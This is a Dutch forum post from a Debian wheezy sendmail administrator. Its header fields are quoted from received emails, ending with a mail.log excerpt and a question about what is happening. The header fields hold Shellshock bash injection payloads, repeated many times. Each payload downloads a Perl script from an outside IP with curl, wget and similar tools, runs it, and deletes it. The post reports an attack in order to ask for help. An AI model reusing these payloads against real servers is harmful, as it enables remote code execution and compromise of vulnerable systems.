Ik heb een paar emails ontvangen met: from, subject, to, cc, messageId, etc met daarin :
To:
() { :;;};/bin/sh.-c.'/bin/sh.-c.'cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http://178.254.31.165/ex.txt;wget.17...#39;.&;;;;;;;;
References:
() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Cc:
() { :;;};/bin/sh.-c.'cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http://178.254.31.165/ex.txt;wget.17...#39;.&;;;;;;;;
From:
() { :;;};/bin/sh.-c.'cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http://178.254.31.165/ex.txt;wget.17...#39;.&;;;;;;;;
Subject:
() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Date:
() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Message-ID:
() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Comments:
() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Keywords:
() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Resent-Date:
() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Resent-From:
() { :;;};/bin/sh.-c.'cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http://178.254.31.165/ex.txt;wget.17...#39;.&;;;;;;;;
volgens de mail.log
Oct 24 19:32:12 pie sm-mta[8940]: s9OHWALZ008940: from=<support@mata.com>, size=2364, class=0, nrcpts=1, msgid=<201410241732.s9OHWALZ008
940@lokaal.xx>, proto=SMTP, daemon=MTA, relay=u16850951.onlinehome-server.com [74.208.184.251]
Oct 24 19:32:12 pie sm-mta[8942]: s9OHWALZ008940: to=<root@localhost>, delay=00:00:00, xdelay=00:00:00, mailer=local, pri=32636, dsn=2.0
.0, stat=Sent
het is me duidelijk dat er een perl file "ex.txt" getracht download word naar /tmp en deze uit eindelijk weer word verwijderd.
iemand bekend met dit 'fenomeen'?
Het betreft een debian wheezy, sendmail systeem